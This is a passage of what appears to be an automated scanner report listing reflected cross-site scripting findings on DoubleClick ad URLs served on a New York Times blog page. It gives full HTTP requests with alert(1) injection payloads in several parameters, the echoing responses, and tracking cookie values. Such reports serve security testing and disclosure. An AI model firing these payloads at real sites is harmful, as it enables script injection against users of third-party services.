Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
8/3b05/7/128/%2a/d%3B240674684%3B0-0%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=gotoa9ad8'-alert(1)-'abd4b72ba03&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be
...[SNIP]...

4.53. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c8cb"-alert(1)-"c06727afda5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.13;sz=300x250;pc=nyt160964A265018;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto1c8cb"-alert(1)-"c06727afda5&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be015cda&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6766

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
8/3b05/7/128/%2a/d%3B240674684%3B0-0%3B0%3B63131103%3B4307-300/250%3B41996799/42014586/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265018%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto1c8cb"-alert(1)-"c06727afda5&opzn&page=blog.nytimes.com/dealbook&pos=MiddleRight&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart300x250&sn2=4deeed34/c8e8c4bb&snr=doubleclick&snx=1305198667&sn1=ef2b314b/be
...[SNIP]...

4.54. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a918'-alert(1)-'8a98d61d702 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x908a918'-alert(1)-'8a98d61d702&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
19%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x908a918'-alert(1)-'8a98d61d702&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.55. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3335a"-alert(1)-"d20d01cfbe4 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x903335a"-alert(1)-"d20d01cfbe4&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
19%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x903335a"-alert(1)-"d20d01cfbe4&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?d
...[SNIP]...

4.56. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 421d5"-alert(1)-"075af53bbdf was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2421d5"-alert(1)-"075af53bbdf&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2421d5"-alert(1)-"075af53bbdf&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvent
...[SNIP]...

4.57. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74793'-alert(1)-'ea56e5f634 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt274793'-alert(1)-'ea56e5f634&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:17:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6725

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt274793'-alert(1)-'ea56e5f634&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvent
...[SNIP]...

4.58. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3039'-alert(1)-'e3d745f63fd was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a3039'-alert(1)-'e3d745f63fd HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a3039'-alert(1)-'e3d745f63fdhttp://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.59. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0dd0"-alert(1)-"368571c22a3 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a0dd0"-alert(1)-"368571c22a3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=a0dd0"-alert(1)-"368571c22a3http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.60. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89feb'-alert(1)-'01cc9048b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&89feb'-alert(1)-'01cc9048b49=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6741

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&89feb'-alert(1)-'01cc9048b49=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;\">
...[SNIP]...

4.61. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48d43"-alert(1)-"5168faf1b2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&48d43"-alert(1)-"5168faf1b2a=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:18:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6741

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
page=blog.nytimes.com/dealbook&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=&48d43"-alert(1)-"5168faf1b2a=1http://newsroom.intel.com/community/intel_newsroom/blog/2011/05/04/intel-reinvents-transistors-using-new-3-d-structure?dfaid=1&crtvid=41996802;");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.62. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 996c3"-alert(1)-"92317d430a2 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N5364.nytimes/B5378238.14;sz=728x90;pc=nyt160964A265019;ord=2011.05.12.11.15.46;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook996c3"-alert(1)-"92317d430a2&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:16:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6729

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
0%3B0%3B63131104%3B3454-728/90%3B41996802/42014589/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt160964A265019%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook996c3"-alert(1)-"92317d430a2&pos=TopAd&camp=Intel_US11q2CORMGCorp-1691749-nyt2&ad=US11q2CORMGCorp.Dealbook.dart728x90&sn2=6173115d/a6371399&snr=doubleclick&snx=1305198667&sn1=63ea7fe9/b57741b4&goto=http://newsroom.intel.com/commu
...[SNIP]...

4.63. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5364.nytimes/B5378238.14

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3f05'-alert(1)-'f00d86fef5b was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

